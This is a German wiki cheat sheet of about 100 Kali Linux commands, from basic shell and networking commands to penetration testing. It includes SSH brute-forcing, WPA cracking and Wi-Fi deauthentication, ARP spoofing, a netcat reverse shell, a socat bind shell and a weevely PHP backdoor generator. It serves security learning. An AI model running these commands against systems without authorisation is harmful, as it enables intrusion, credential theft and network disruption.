100 Kali Kommandos

Aus Xinux Wiki
Version vom 16. November 2025, 08:54 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „= 01. Basic Linux Commands = Zeigt das aktuelle Arbeitsverzeichnis. *pwd Listet Dateien und Verzeichnisse auf. *ls Wechselt das Verzeichnis. *cd Erstellt e…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

01. Basic Linux Commands

Zeigt das aktuelle Arbeitsverzeichnis.

  • pwd

Listet Dateien und Verzeichnisse auf.

  • ls

Wechselt das Verzeichnis.

  • cd

Erstellt ein neues Verzeichnis.

  • mkdir <dir>

Löscht eine Datei.

  • rm <file>

Löscht ein Verzeichnis rekursiv.

  • rm -r <dir>

Kopiert Dateien.

  • cp <src> <dest>

Verschiebt oder benennt Dateien um.

  • mv <src> <dest>

Erstellt eine leere Datei.

  • touch <file>

Gibt den Inhalt einer Datei aus.

  • cat <file>

Öffnet eine Datei im Editor Nano.

  • nano <file>

Öffnet eine Datei im Editor Vim.

  • vim <file>

Sucht eine Datei anhand des Namens.

  • find / -name <filename>

Durchsucht eine Datei nach Textmustern.

  • grep "text" <file>

Zeigt die eingaben Befehle der Shell-Historie.

  • history

02. System Information Commands

Zeigt Systeminformationen.

  • uname -a

Zeigt den aktuellen Benutzer.

  • whoami

Zeigt UID und GID des Benutzers.

  • id

Zeigt die Systemlaufzeit.

  • uptime

Zeigt den belegten Festplattenplatz.

  • df -h

Zeigt die Größe eines Verzeichnisses.

  • du -sh <dir>

Zeigt aktive Prozesse.

  • top

Listet alle Prozesse auf.

  • ps aux

Beendet einen Prozess über die PID.

  • kill <PID>

Interaktiver Prozessmanager.

  • htop

03. User Management Commands

Erstellt einen neuen Benutzer.

  • adduser <username>

Löscht einen Benutzer.

  • deluser <username>

Ändert das Passwort eines Benutzers.

  • passwd <username>

Fügt einen Benutzer zur sudo-Gruppe hinzu.

  • usermod -aG sudo <username>

Zeigt Gruppenmitgliedschaften eines Benutzers.

  • groups <username>

Ändert Dateiberechtigungen.

  • chmod 777 <file>

Ändert Dateibesitzer und Gruppe.

  • chown user:group <file>

04. Networking Commands

Zeigt Netzwerkinterfaces an.

  • ifconfig

Zeigt IP-Adressen und Interfaces.

  • ip a

Zeigt Wireless-Interfaces an.

  • iwconfig

Testet Netzwerkverbindung via ICMP.

  • ping <IP>

Zeigt offene Ports mit zugehörigen Prozessen.

  • netstat -tulnp

Scant ein Zielsystem auf offene Ports.

  • nmap <IP>

Zeigt den Routingpfad zu einem Host.

  • traceroute <IP>

Lädt Daten von einer URL herunter.

  • curl <URL>

Lädt eine Datei von einer URL.

  • wget <URL>

Zeigt DNS-Informationen zu einer Domain.

  • dig <domain>

Führt einfache DNS-Abfragen durch.

  • nslookup <domain>

05. Hacking & Penetration Testing Commands

Startet die Metasploit-Konsole.

  • msfconsole

Erstellt Payloads.

  • msfvenom

Durchsucht Exploit-Datenbanken.

  • searchsploit <exploit>

Testet SQL-Injection gegen eine URL.

  • sqlmap -u <URL> --dbs

Führt SSH-Bruteforce durch.

  • hydra -l user -P pass.txt <IP> ssh

Crackt Hashes mit John the Ripper.

  • john --wordlist=rockyou.txt hash.txt

Aktiviert den Monitor-Modus für WLAN.

  • airmon-ng start wlan0

Fängt WLAN-Pakete ab.

  • airodump-ng wlan0mon

Deauthentifiziert Clients aus einem WLAN.

  • aireplay-ng -0 10 -a <BSSID> wlan0mon

Crackt WPA/WPA2-Passwörter.

  • aircrack-ng -w rockyou.txt -b <BSSID> <capture_file>

Crackt Hashes mit GPU.

  • hashcat -m 2500 hash.txt rockyou.txt

Führt ARP-Spoofing durch.

  • ettercap -T -q -i eth0

Extrahiert Bilder aus Netzwerktraffic.

  • driftnet -i eth0

Zeichnet Netzwerkpakete auf.

  • tcpdump -i eth0

Analysiert Netzwerkverkehr.

  • tshark -i eth0

Scant Webserver auf Schwachstellen.

  • nikto -h <URL>

Führt Directory-Bruteforce durch.

  • gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt

Scant WordPress-Installationen auf Schwachstellen.

  • wpscan --url <URL>

06. Privilege Escalation & Post-Exploitation

Zeigt sudo-Berechtigungen.

  • sudo -l

Wechselt zum root-Benutzer.

  • sudo su

Erstellt eine interaktive Shell in Python.

  • python -c 'import pty; pty.spawn("/bin/bash")'

Startet einen Netcat-Listener.

  • nc -lvnp <port>

Erstellt eine Reverse-Shell.

  • nc <IP> <port> -e /bin/bash

Zeigt den aktuellen Benutzer im Meterpreter.

  • meterpreter> getuid

Versucht Privilege Escalation im Meterpreter.

  • meterpreter> getsystem

Überträgt Dateien via Meterpreter.

  • meterpreter> upload / download <file>

Öffnet eine System-Shell im Meterpreter.

  • meterpreter> shell

Schlägt mögliche Privileged Escalation Exploits vor.

  • linux-exploit-suggester

07. File & Data Encryption

Verschlüsselt eine Datei mit GPG.

  • gpg -c <file>

Entschlüsselt eine GPG-Datei.

  • gpg -d <file.gpg>

Verschlüsselt Dateien mit OpenSSL.

  • openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>

Entschlüsselt mit OpenSSL AES.

  • openssl enc -d -aes-256-cbc -in <file.enc> -out <file>

08. Forensics & Steganography

Extrahiert druckbare Strings aus Dateien.

  • strings <file>

Analysiert Binärdateien.

  • binwalk <file>

Extrahiert Dateien aus Images.

  • foremost -i <image>

Zeigt Metadaten einer Datei.

  • exiftool <file>

Findet versteckte Daten in Bildern.

  • stegseek <stegfile>

09. Password & Hash Cracking

Erkennt Hash-Typen.

  • hashid <hash>

Bruteforced SSH-Zugänge.

  • hydra -L users.txt -P passwords.txt ssh://<IP>

Crackt Passwort-Hashes.

  • john hash.txt --wordlist=rockyou.txt

10. Web Application Testing

Führt Directory Enumeration durch.

  • dirb <URL>

Führt Web-Fuzzing durch.

  • wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ

Testet Webanwendungen auf XSS.

  • xsssniper -u <URL>

Testet Webanwendungen auf Command Injection.

  • commix --url <URL>

Startet Burp Suite.

  • burpsuite

Miscellaneous

Erstellt Wordlists aus Zeichenfolgen.

  • crunch 8 8 abcdefghijklmnopqrstuvwxyz

Führt nmap über Proxychains aus.

  • proxychains nmap -sT -Pn <IP>

Startet Tor.

  • tor

Startet einen MITM-Proxy.

  • mitmproxy

Startet das Social Engineering Toolkit.

  • setoolkit

Erstellt eine Wordlist aus einer Webseite.

  • cewl -w words.txt -d 5 <URL>

Erstellt einen Web-Backdoor mit weevely.

  • weevely generate password backdoor.php

Startet einen bind shell via socat.

  • socat TCP-LISTEN:4444,fork EXEC:/bin/bash

Zeigt Domaininformationen an.

  • whois <domain>

Sammelt Mails und Subdomains zu einer Domain.

  • theHarvester -d <domain> -l 100 -b google

Crackt ZIP-Passwörter.

  • fcrackzip -u -D -p rockyou.txt <file.zip>

Sucht Subdomains.

  • dnsmap -d <domain>